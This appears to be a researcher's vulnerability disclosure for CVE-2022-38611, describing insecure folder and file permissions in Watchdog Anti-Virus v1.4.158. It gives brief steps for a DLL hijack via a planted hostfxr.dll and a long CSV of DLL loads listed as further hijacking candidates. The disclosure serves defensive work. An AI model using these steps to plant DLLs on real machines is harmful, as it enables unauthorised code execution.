
@dru1d-foofus
Last active October 20, 2022 16:18
CVE-2022-38611 - WatchDog Anti-Virus Research

CVE-2022-38611 - Watchdog Anti-Virus v1.4.158 Vulnerabilities

CVE - https://nvd.nist.gov/vuln/detail/CVE-2022-38611

Watchdog Anti-Virus v1.4.158 has insecure ACLs applied to its core components; this includes:

  • The C:\Program Files (x86)\Watchdog Anti-Virus\ directory allows BUILTIN\Users to modify the ACLs of the directory and of its inherited objects.
  • BUILTIN\Users are given full control of the WAV.exe binary itself and associated libraries.

These permission issues could allow any user to execute code through DLL hijacking.

Steps to Reproduce DLL Hijack

  1. Identify a target for hijack. I chose hostfxr.dll because it does not currently exist in my C:\Program Files (x86)\Watchdog Anti-Virus\ directory.
  2. Create malicious DLL with exported function. hostfxr.dll's hostfxr_main_startupinfo or DLLMain exports worked during testing.
  3. Copy malicious hostfxr.dll to the C:\Program Files (x86)\Watchdog Anti-Virus\ directory.
  4. Launch Watchdog Anti-Virus.

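It should be noted that Watchdog Anti-Virus runs in the context of the current user and does not appear to elevate itself; therefore, there is only code execution and no privilege escalation. On a host shared by several accounts, however, a file written into this directory by one user would presumably be loaded in the session of whichever user next launches the product, so the ACLs on the install directory should still be restricted to administrators.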

Additional items included:

  • dll_results.csv, which contains other sideloading/hijacking candidates.
  • File_ACLs.txt, which contains a recursive listing of the ACLs applied to files within the Watchdog Anti-Virus program directory.
Executable,WinAPI,DLL,EntryPoint / WinAPI Args
unins000.exe,LoadLibraryW,LPCWSTR: Msctf.dll
unins000.exe,LoadLibraryA,LPCSTR: wtsapi32.dll
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\wtsapi32.dll, LPCSTR: WTSRegisterSessionNotification
unins000.exe,LoadLibraryA,LPCSTR: uxtheme.dll
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: BufferedPaintInit
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: OpenThemeData
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: CloseThemeData
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeText
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundContentRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundContentRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePartSize
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeTextExtent
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeTextMetrics
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBackgroundRegion
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: HitTestThemeBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeEdge
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeIcon
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemePartDefined
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeBackgroundPartiallyTransparent
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeColor
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeMetric
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeString
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeBool
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeInt
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeEnumValue
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePosition
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeFont
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeRect
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeMargins
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeIntList
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemePropertyOrigin
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: SetWindowTheme
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeFilename
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysColor
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysColorBrush
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysBool
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysSize
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysFont
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysString
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeSysInt
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeActive
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsAppThemed
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetWindowTheme
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: EnableThemeDialogTexture
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: IsThemeDialogTextureEnabled
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeAppProperties
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: SetThemeAppProperties
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetCurrentThemeName
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: GetThemeDocumentationProperty
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: DrawThemeParentBackground
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: EnableTheming
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\SYSTEM32\wtsapi32.dll, LPCSTR: WTSUnRegisterSessionNotification
unins000.exe,GetProcAddress,hModule : C:\WINDOWS\system32\uxtheme.dll, LPCSTR: BufferedPaintUnInit
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_main_startupinfo
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_set_error_writer
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_load
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_unload
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main_with_output_buffer
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_set_error_writer
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_initialize
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_initialize
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_shutdown_2
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_execute_assembly
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_create_delegate
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.CoreLib.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, dwFlags : NONE
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: jitStartup
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: getJit
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Diag.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Console.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Thread.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Text.Encoding.Extensions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_DeflateInit2_
Diag.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Memory.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Crc32
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Deflate
Diag.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_DeflateEnd
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_main_startupinfo
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\host\fxr\6.0.7\hostfxr.dll, LPCSTR: hostfxr_set_error_writer
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_load
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_unload
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_main_with_output_buffer
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_set_error_writer
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\hostpolicy.dll, LPCSTR: corehost_initialize
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, dwFlags : LOAD_LIBRARY_SEARCH_DEFAULT_DIRS|LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_initialize
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_shutdown_2
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_execute_assembly
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\coreclr.dll, LPCSTR: coreclr_create_delegate
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.CoreLib.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, dwFlags : NONE
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: jitStartup
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\clrjit.dll, LPCSTR: getJit
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Domain.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\WAV.Shared.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Console.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\Newtonsoft.Json.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\netstandard.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.Win32.Registry.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Serialization.Formatters.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Concurrent.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.TraceSource.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.Expressions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Numerics.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.Uri.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Linq.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.TypeConverter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ObjectModel.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.Serialization.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Data.Common.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Xml.ReaderWriter.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Private.Xml.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Emit.ILGeneration.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Emit.Lightweight.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\BCrypt.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Memory.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\log4net.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\System.Configuration.ConfigurationManager.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Specialized.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.WebClient.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.ComponentModel.EventBasedAsync.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Net.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Text.Encoding.Extensions.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Threading.Thread.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.NonGeneric.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Diagnostics.StackTrace.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : Microsoft.DiaSymReader.Native.amd64.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.DiaSymReader.Native.amd64.dll, LPCSTR: DllGetClassObject
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Reflection.Metadata.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Collections.Immutable.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Runtime.InteropServices.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_InflateInit2_
WAV.exe,GetProcAddress,hModule : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.IO.Compression.Native.dll, LPCSTR: CompressionNative_Inflate
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.Principal.Windows.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files (x86)\Watchdog Anti-Virus\System.Threading.AccessControl.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\System.Security.AccessControl.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
WAV.exe,LoadLibraryExW,LPCWSTR : C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.7\Microsoft.Win32.Primitives.dll, dwFlags : LOAD_WITH_ALTERED_SEARCH_PATH
